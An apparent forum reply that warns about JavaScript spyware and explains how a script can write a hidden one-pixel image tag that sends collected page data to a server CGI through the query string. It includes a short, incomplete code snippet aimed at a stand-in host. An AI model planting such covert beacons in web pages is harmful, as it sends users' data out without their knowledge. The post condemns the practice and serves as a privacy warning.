It is easy to do. It is also quite possibly illegal, immoral or fattening. *IT IS SPYWARE* While I agree with MUBA that their is little community benefit in telling you how to do it, the practice is so rife that even the most rudimentary research will make you aware of it.

This is presented as a warning on the evils of javascript.

All you need is for the javascript/vbscript being executed on the client side to phone home. The spyware way to do this is using an IMG tag, although there are other possibilities. A browser will GET the src from the image tag. Without asking the urer. This is what browsers do. This SRC can point to a CGI on your server just as easily as it can point to a real image. You can add this image tag and src dynamically. Put the parts together and what have you got - spyware.

<script>
var wanted_data = ....
var spyware_url = http://mydomain.com/cgi-bin/spyware.cgi?spyval=' + e
+scape(wanted_data);
document.write('<IMG src="' + spyware_url + '" width="1" height="1">')
+;
</script>
[download]

Now when that HTML loads it will get your spyware value, add it to the url of your spyware cgi, then write an image tag into the current doc which will cause the browser to issue a get request to your spyware with the data added to the query string. Your Perl CGI spyware on the server side parses off the q string, and then delivers a single pixel transparent gif to the browser. The client is then unaware you are spying on them -> *until they view source* and the simple action of loading the page triggers the event.

Personally I find the whole practice a nasty invasion of privacy and it's one of the reasons I don't let JS run unless I absolutely have to.